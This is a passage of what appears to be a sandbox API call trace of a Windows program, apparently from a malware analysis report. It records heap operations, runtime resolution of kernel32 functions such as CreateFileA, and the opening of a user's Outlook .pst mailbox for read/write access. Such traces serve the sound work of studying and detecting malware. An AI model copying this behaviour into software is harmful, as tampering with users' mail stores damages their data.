cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0176.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba540 [0176.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba540, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.175] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0176.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0176.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.176] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0176.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0176.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0176.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0176.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d) returned 0x923a78 [0176.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", cchWideChar=77, lpMultiByteStr=0x923a78, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpUsedDefaultChar=0x0) returned 77 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0176.178] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0176.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0176.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0176.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0176.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=77, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9a) returned 0x8f9058 [0176.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=77, lpWideCharStr=0x8f9058, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 77 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0176.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0176.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0176.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.183] FreeLibrary (hLibModule=0x75990000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0176.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0176.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0176.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0176.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.185] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0176.185] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0176.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0176.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0176.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0176.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0176.186] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0176.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0176.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0176.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0176.188] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0176.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0176.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0176.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0176.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: 